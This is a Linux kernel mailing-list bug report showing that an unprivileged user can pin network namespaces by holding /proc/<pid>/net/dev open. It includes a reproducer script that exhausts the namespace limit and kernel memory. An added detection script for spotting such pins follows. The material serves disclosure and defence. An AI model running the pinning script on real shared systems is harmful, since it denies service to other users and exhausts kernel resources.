Date:   Mon, 24 Aug 2020 23:49:24 +0200 (CEST)
From:   Arne Welzel <arne.welzel@...il.com>
To:     netdev@...r.kernel.org
Subject: Opening /proc/<pid>/net/dev prevents network namespace from expiring

Hello,

[reposting from kernelnewbies as suggested by Greg]

As an unprivileged user, one is able to keep network namespaces from
expiring by opening /proc/<pid>/net/dev of other processes. I've previously
put this on stackexchange [1] and then bugzilla [2]. That's been a while
though, so posting here for a bit more visibility in case it's something
that's worth fixing.

The reproducer is roughly as follows. As root:

# echo "100" > /proc/sys/user/max_net_namespaces
# while true ; do
#     (unshare -n bash -c 'sleep 0.3 && readlink /proc/self/ns/net') || sleep 0.5
# done

As an unprivileged user in a second terminal, run the Python script below [3]:
# python3 pin_net_namespaces.py

After about one minute the first terminal will show the following until the
Python process keeping the network namespaces alive is terminated.
...
unshare: unshare failed: No space left on device
unshare: unshare failed: No space left on device

Without the change to max_net_namespaces reproducing just takes very long,
but then also kernel memory grows fairly large.

Does that seem like problematic behavior? I had attached a patch and tests
to [2], but I fall into the kernel newbie category, so not sure how useful.

Thanks,
   Arne


[1] https://unix.stackexchange.com/questions/576718/opening-proc-pid-net-dev-prevents-network-namespace-from-expiring-is-this-ex/
[2] https://bugzilla.kernel.org/show_bug.cgi?id=207351

[3] $ cat pin_net_namespaces.py
#!/usr/bin/env python3
import glob
import os
import time

# inode of each /proc/<pid>/net/dev seen so far -> open file object.
# Every network namespace has its own inode for net/dev, so this holds
# one open file per namespace; keeping it open keeps the namespace alive.
net_namespaces = {}

while True:
    for net_dev in glob.glob("/proc/*/net/dev"):
        try:
            ino = os.stat(net_dev).st_ino
            if ino not in net_namespaces:
                # the file is intentionally never closed: that is the pin
                net_namespaces[ino] = open(net_dev)
                print("Have", len(net_namespaces), "namespaces...")
        except FileNotFoundError:
            # the process exited between glob() and stat()/open(); not fast enough...
            pass

    time.sleep(0.2)

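The post shows the pinning side: an unprivileged process holding /proc/<pid>/net/dev open keeps that network namespace, and the kernel memory behind it, alive after the owning process is gone. The defender's counterpart is to find who is holding such files. The script below is an added example written for this page, not part of the original post or of any kernel tooling. It walks /proc/<holder>/fd, picks out descriptors whose link target has the form /proc/<pid>/net/<entry> (the assumption being that this is the path procfs reports for a file opened through another process's net directory), and flags two cases: the target pid no longer exists, so only the descriptor is keeping that namespace alive, and the target is still alive but lives in a different network namespace than the holder. To make it runnable offline, build_sample_proc() constructs a miniature fake /proc tree of symlinks in a temporary directory; the pids and namespace inode numbers in it are made up.

```python
#!/usr/bin/env python3
"""Find processes holding open files under other processes' /proc/<pid>/net/.

Added example for this page; not the reproducer from the original post.
"""
import os
import re
import tempfile

# Assumption: readlink(/proc/<holder>/fd/<n>) for a file opened via
# /proc/<pid>/net/<entry> yields exactly that path.
NET_FD_RE = re.compile(r"^/proc/(\d+)/net/(.+)$")


def _read_link(path):
    """readlink() that returns None instead of raising (EACCES, ENOENT, ...)."""
    try:
        return os.readlink(path)
    except OSError:
        return None


def net_ns_of(pid, proc_root="/proc"):
    """Return the 'net:[inode]' identifier of pid's network namespace, or None."""
    return _read_link(os.path.join(proc_root, str(pid), "ns", "net"))


def scan_pinned_net_files(proc_root="/proc"):
    """Return sorted (holder_pid, fd, target_pid, entry, reason) tuples.

    reason is 'target-gone' when /proc/<target_pid> no longer exists (the
    descriptor alone is keeping that namespace alive) or 'foreign-netns'
    when the target is alive but in a different network namespace.
    """
    findings = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        holder = int(name)
        fd_dir = os.path.join(proc_root, name, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue  # process exited, or its fd table is not readable by us
        holder_ns = net_ns_of(holder, proc_root)
        for fd in fds:
            target = _read_link(os.path.join(fd_dir, fd))
            if target is None:
                continue
            m = NET_FD_RE.match(target)
            if not m:
                continue  # ordinary file, socket, pipe, ...
            target_pid, entry = int(m.group(1)), m.group(2)
            if target_pid == holder:
                continue  # a process reading its own net/ files is normal
            if not os.path.isdir(os.path.join(proc_root, str(target_pid))):
                findings.append((holder, int(fd), target_pid, entry, "target-gone"))
            else:
                target_ns = net_ns_of(target_pid, proc_root)
                if holder_ns and target_ns and target_ns != holder_ns:
                    findings.append((holder, int(fd), target_pid, entry, "foreign-netns"))
    findings.sort()
    return findings


def build_sample_proc(root=None):
    """Constructed miniature /proc tree (symlinks only; pids and ns ids are made up)."""
    root = root or tempfile.mkdtemp(prefix="fakeproc-")

    def mk(pid, ns):
        os.makedirs(os.path.join(root, str(pid), "fd"))
        os.makedirs(os.path.join(root, str(pid), "ns"))
        os.symlink(ns, os.path.join(root, str(pid), "ns", "net"))

    def fd(pid, n, target):
        os.symlink(target, os.path.join(root, str(pid), "fd", str(n)))

    mk(100, "net:[4026531992]")  # the "pinner", in the initial namespace
    mk(200, "net:[4026532201]")  # a live process in another namespace
    mk(300, "net:[4026531992]")  # same namespace as the pinner
    fd(100, 0, "/dev/pts/0")            # unrelated fd, ignored
    fd(100, 3, "/proc/555/net/dev")     # pid 555 has no entry here: it exited
    fd(100, 4, "/proc/200/net/dev")     # alive, but a foreign namespace
    fd(100, 5, "/proc/300/net/route")   # same namespace as holder, not flagged
    fd(200, 3, "/proc/200/net/dev")     # own files, not flagged
    return root


if __name__ == "__main__":
    for holder, fd, target, entry, reason in scan_pinned_net_files():
        print(f"pid {holder} fd {fd} -> /proc/{target}/net/{entry}: {reason}")
```

Run as root on a real system so that every process's fd table is readable; as an unprivileged user the scan silently skips other users' processes, which is exactly the blind spot the post's reproducer exploits from the other direction.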